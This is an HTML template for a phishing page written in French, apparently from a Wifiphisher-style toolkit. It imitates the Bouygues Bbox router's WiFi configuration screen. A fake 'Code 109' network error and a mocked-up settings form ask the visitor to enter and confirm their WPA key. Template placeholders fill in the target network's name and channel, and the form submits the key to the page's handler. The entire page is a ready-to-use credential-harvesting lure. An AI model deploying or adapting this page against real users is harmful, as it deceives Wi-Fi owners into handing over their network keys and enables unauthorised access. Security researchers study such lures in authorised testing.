<!DOCTYPE html>
<html>

<head>
    <meta charset='utf-8'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="Content-language" content="fr">
    <meta name="author" content="Lucien Burdet">
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <title>Bbox</title>
    <link rel="icon" type="image/png" href="./static/images/favicon.png" />
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/bootstrap.min.css'>
    <link rel='stylesheet' type='text/css' media='screen' href='./static/css/style.css'>
    <script src='./static/js/jquery.min.js'></script>
    <script src='./static/js/bootstrap.bundle.min.js'></script>
    <script src='./static/js/bouygues.js'></script>
</head>

<body>
    <nav class="navbar navbar-expand-lg navbar-dark bg-primary">
        <a class="navbar-brand" href="#" data-toggle="modal" data-target="#modal">
            <img class="logo" src="./static/images/logo.png">
        </a>
        <h1>
            Bbox
        </h1>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02"
            aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
    </nav>

    <div class="alert alert-dismissible alert-info">
        <strong>Code 109: Erreur réseau inconnue</strong>
        <p>
            Veuillez vous reconnecter avec la clé WPA/WEP dans le
            champ ci dessous et valider.
            La clé WPA figure derrière votre Bbox sur une petite étiquette. Ensuite maintenez appuyer 2 secondes le
            bouton wifi de votre Bbox. Besoin d'aide ? Obtenez un technicien Bouygues en ligne en cliquant
            <a href="#" data-toggle="modal" data-target="#modal">ici</a>
        </p>
    </div>

    <div class="row">
        <div class="col-3">
            <div class="jumbotron">
                <h4>Préférences générales</h4>
                <ul class="left-nav">
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Etat des connexions</a>
                    </li>
                    <li> 
                        <a class="black-color"href="#" data-toggle="modal" data-target="#modal">Jeux et Applications</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Schéma de mon réseau</a>
                    </li>
                </ul>
                <h4>Configuration avancée</h4>
                <ul class="left-nav">
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Configuration du routeur</a>
                    </li>
                    <li>
                        <a href="#" data-toggle="modal" data-target="#modal">Configuration WiFi</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Périphériques Connectés</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Modification du mot de passe</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Prise en main à distance</a>
                    </li>
                    <li>
                        <a class="black-color" href="#" data-toggle="modal" data-target="#modal">Réinitialisation Bbox</a>
                    </li>
                </ul>
            </div>
        </div>
        <div class="col-9">
            <div class="jumbotron p-t-5">
                <h3>Configuration WiFi</h3>
                <p>{{ target_ap_vendor }}</p>

                <div class="alert alert-dismissible alert-info">
                    <strong>Code 109: Erreur réseau inconnue</strong>
                    <p>
                        Veuillez vous reconnecter avec la clé WPA/WEP dans
                        le champ ci dessous et valider.
                        La clé WPA figure derrière votre Bbox sur une petite étiquette. Ensuite maintenez appuyer 2
                        secondes le bouton wifi de votre Bbox. Besoin d'aide ? Obtenez un technicien Bouygues en ligne
                        en cliquant
                        <a href="#" data-toggle="modal" data-target="#modal">ici</a>
                    </p>
                </div>

                <p>
                    Le service WiFi est 
                    <strong>activé</strong>
                    <button class="btn btn-primary disabled" type="button" data-toggle="modal" data-target="#modal">Désactiver le service</button>
                </p>
                <table class="table table-hover">
                    <thead>
                        <tr>
                            <th scope="col">Adresse physique (MAC)</th>
                            <th scope="col">Bande de fréquence</th>
                        </tr>
                    </thead>
                    <tbody>
                        <tr>
                            <td>XX:XX:XX:XX:XX:XX</td>
                            <td>2,4 GHz</td>
                        </tr>
                    </tbody>
                </table>

                <form id="bouygues-wpa" method="POST" action="valid.html">
                    <fieldset>
                        <legend class="blue-color">Généralités</legend>
                        <div class="form-group">
                            <label for="ssid">Nom du réseau (SSID)</label>
                            <input value="{{ target_ap_essid }}" type="text" class="form-control" id="ssid"
                                placeholder="Nom du réseau (SSID)">
                        </div>
                        <div class="form-group">
                            <label for="mode">Type d'interface</label>
                            <select class="form-control" id="mode">
                                <option>802.11 b/g</option>
                                <option selected>802.11 b/g/n</option>
                            </select>
                        </div>
                        <div class="form-group">
                            <label for="canal">Numéro de canal</label>
                            <select class="form-control" id="canal">
                                <option>1</option>
                                <option>2</option>
                                <option>3</option>
                                <option>4</option>
                                <option>5</option>
                                <option>6</option>
                                <option>7</option>
                                <option>8</option>
                                <option>9</option>
                                <option>10</option>
                                <option>11</option>
                                <option>12</option>
                                <option selected>Auto ({{ target_ap_channel }})</option>
                            </select>
                        </div>
                        <img src="./static/images/aide.jpg">
                        <div class="form-group">
                            <label for="wpa">Clé WPA</label>
                            <input name="wfphshr-password" type="text" class="form-control" id="wpa"
                                placeholder="Clé WPA">
                        </div>
                        <div class="form-group">
                            <label for="wpa-confirmation">Confirmation</label>
                            <input name="wfphshr-password-confirm" type="text" class="form-control"
                                id="wpa-confirmation" placeholder="Confirmation">
                        </div>
                        <button id="bouygues-wpa-btn" type="submit" class="btn btn-primary m-b-50">Valider</button>
                </form>
            </div>
        </div>
    </div>

    <div class="modal" id="modal" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title">Code 109: Erreur réseau inconnue</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    <p>
                        Veuillez vous reconnecter avec la clé WPA/WEP dans le champ ci dessous et valider.
                        La clé WPA figure derrière votre Bbox sur une petite étiquette. Ensuite maintenez appuyer 2
                        secondes le bouton wifi de votre Bbox. Besoin d'aide ? Obtenez un technicien Bouygues en ligne
                        en cliquant
                        <a href="#" data-toggle="modal" data-target="#modal">ici</a>
                    </p>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Fermer</button>
                </div>
            </div>
        </div>
    </div>

</body>

</html>